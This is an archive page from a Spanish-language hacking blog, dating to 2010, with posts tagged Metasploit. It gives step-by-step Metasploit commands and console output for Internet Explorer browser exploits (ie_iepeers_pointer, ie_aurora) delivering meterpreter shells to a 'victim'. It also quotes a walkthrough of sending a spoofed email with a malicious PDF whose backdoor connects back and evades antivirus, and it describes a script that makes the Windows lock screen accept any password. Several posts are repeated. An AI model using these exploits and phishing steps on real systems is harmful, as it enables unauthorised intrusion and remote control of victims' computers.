> set PAYLOAD windows/meterpreter/reverse_tcp
> set SRVHOST
> set SRVPORT
> set LHOST
> set URIpath test.html
> exploit
Internet Explorer iepeers.dll use-after-free - Demo from Chris John Riley on Vimeo.
Últimas entradas »
Mostrando entradas con la etiqueta Metasploit. Mostrar todas las entradas
Mostrando entradas con la etiqueta Metasploit. Mostrar todas las entradas
domingo, 14 de marzo de 2010
[Metasploit] ie_iepeers_pointer
> use exploit/windows/browser/ie_iepeers_pointer
> set PAYLOAD windows/meterpreter/reverse_tcp
> set SRVHOST
> set SRVPORT (80)
> set LHOST
> set URIpath test.html
> exploit
> set PAYLOAD windows/meterpreter/reverse_tcp
> set SRVHOST
> set SRVPORT
> set LHOST
> set URIpath test.html
> exploit
jueves, 25 de febrero de 2010
[Metasploit]Pantalla desbloqueada con script del meterpreter
El MSF cada día me gusta mas jajaja :P, ahora les traigo un video de como ingresar a un sistema con el MSF y desbloquear la pantalla :P. Acá dejo la descripción de dondé encontré el video + el video :P
Suerte!
"In this video, we look at a demo of the screen unlock meterpreter script. The script needs SYSTEM privileges and patches the msv1_0.dll loaded by lsass.exe so that every password will be accepted to unlock the screen. (the patch can also be undone to get back to normal behavior). Currently Windows XP SP2 and SP3 are supported. You can download it from here. The script author's blog has more details.Thanks go out to PaulDotCom for uploading this to vimeo"
Suerte!
"In this video, we look at a demo of the screen unlock meterpreter script. The script needs SYSTEM privileges and patches the msv1_0.dll loaded by lsass.exe so that every password will be accepted to unlock the screen. (the patch can also be undone to get back to normal behavior). Currently Windows XP SP2 and SP3 are supported. You can download it from here. The script author's blog has more details.Thanks go out to PaulDotCom for uploading this to vimeo"
Meterpreter Screensaver unlock script from PaulDotCom on Vimeo.
[Metasploit] Intrusion Automatizada con Nmap y MSF
Bueno... jajaj esto comprueba mi "teoría" de que el bug del puerto 445 ya algo antiguo
pero no por eso deja de ser un bug con buena explotación.
Este video básicamente trata encontrar una victima con el puerto 445 explotable y que con el
Metasploit automatizar una analisis y ver cual es el mejor exploit para usar :), realmente bueno :).
Suerte!
LINK DEL VIDEO
PD: Autor del video: Progresive Death
pero no por eso deja de ser un bug con buena explotación.
Este video básicamente trata encontrar una victima con el puerto 445 explotable y que con el
Metasploit automatizar una analisis y ver cual es el mejor exploit para usar :), realmente bueno :).
Suerte!
LINK DEL VIDEO
PD: Autor del video: Progresive Death
domingo, 21 de febrero de 2010
[Metasploit] Adobe Exploit :)
En ingles :) , el que sabe, sabe y el que no usa el traductor de google XD
Aquí en Español
Fuente: http://www.question-defense.com/
Using an Adobe Exploit in a Email Attack
Aquí en Español
Fuente: http://www.question-defense.com/
Using an Adobe Exploit in a Email Attack
This attack takes advantage of a vulnerability in Adobe Reader and Acrobat. The official release is here. Adobe has been informed of this vulnerability for well over a month now and has issued a statement that it will release a fix on January 14th. It is a scary thought that this exploit will be live and in the wild for almost 2 months before Adobe decides to fix it. I am making this post in order to make people aware of how such a attack can take place and how easy it is to implement.
I will be using the Metasploit framework and Backtrack Linux in order to launch this attack.
So starting out as the attacker the first thing we need to do is craft a .pdf which contains the malicious code that will trigger the vulnerability in Adobe.
As you can see I created a .pdf with a perfectly legit looking name. I also added the Meterpreter “Backdoor” to the file with instructions to connect back to my attacking machine on port 8080 when it is opened. Most firewalls are not configured to inspect out going requests so this is a fairly effective way to bypass any firewall.
The next thing to do is craft a email which we will send to our victim. I mainly choose this method of attack in order to demonstrate how easy it is to send a spoofed email.
Okay so the last thing we need to do is start our “Listener” . This is the process that will be waiting for the victim computers connection once the malicious .pdf is opened.
You will notice that I started the handler with the same payload, port and ip address which I used when I crafted the .pdf file file. This is a crucial step or the attack will not work.
Ok so now that we are all set, lets take a look at our victim….
There is our email in the victims gmail box. Looks perfectly normal doesn’t it?
Next our victim goes to download the .pdf so he can open it at his convenience later.
Notice how I highlighted in bright red that this computer is running a up to date version of the anti virus avast. The Meterpreter backdoor is not detected by antivirus. Our victim could scan this .pdf with 10 different anti-virus and it would come up clean each time.
Next our poor guy will open the .pdf only to find to his dismay its blank and starts creating some stability issues for Adobe.
Now we could have added some official looking text into this .pdf with real security instructions and stuff but I did not. Once again you can believe an attacker will go through the trouble of making it look very official.
So meanwhile back at the ranch where we have been patiently waiting…….
As soon as our poor victim opened the .pdf file, our backdoor reached out and connected to the attacker machine.
Thats it!
So what did we learn?
viernes, 19 de febrero de 2010
[Metasploit] Exploit IE_Aurora 0-day
Bueno... peluciando por la internet encontré este bug en el IE que permite obtener shell remota :). Ya que me gustó lo explicaré a mi manera pero igual posteriormente pondré el link de donde encontré esta información.
Pasos:
1.- Descargar exploit AQUI
2.- Guardarlo en cualquier carpeta(en este caso Windows/Browser/)
3.- Ejecutamos el MSF y seguimos los sigente comandos:
=[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 482 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7957 updated 58 days ago (2009.12.23)
Warning: This copy of the Metasploit Framework was last updated 58 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://dev.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
msf exploit(ie_aurora) > set srvhost 192.168.0.101
srvhost => 192.168.0.101
msf exploit(ie_aurora) > set uripath /
uripath => /
msf exploit(ie_aurora) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Using URL: http://192.168.0.101:8080/
[*] Started bind handler
Creo que para los que se manejan en esto está demas dar explicaciones sobre el funcionamiento del MSF así que me ahorro comentarios :).
4.- Luego la victima ingresa a http://192.168.0.101:8080 y WOW! estamos listos :)
Bueno... eso fue todo :), ahora les dejo el link de donde obtube esta información:
Web con la información: elhacker.net
Pasos:
1.- Descargar exploit AQUI
2.- Guardarlo en cualquier carpeta(en este caso Windows/Browser/)
3.- Ejecutamos el MSF y seguimos los sigente comandos:
=[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 482 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7957 updated 58 days ago (2009.12.23)
Warning: This copy of the Metasploit Framework was last updated 58 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://dev.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
msf exploit(ie_aurora) > set srvhost 192.168.0.101
srvhost => 192.168.0.101
msf exploit(ie_aurora) > set uripath /
uripath => /
msf exploit(ie_aurora) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Using URL: http://192.168.0.101:8080/
[*] Started bind handler
Creo que para los que se manejan en esto está demas dar explicaciones sobre el funcionamiento del MSF así que me ahorro comentarios :).
4.- Luego la victima ingresa a http://192.168.0.101:8080 y WOW! estamos listos :)
Bueno... eso fue todo :), ahora les dejo el link de donde obtube esta información:
Web con la información: elhacker.net
Suscribirse a:
Entradas (Atom)
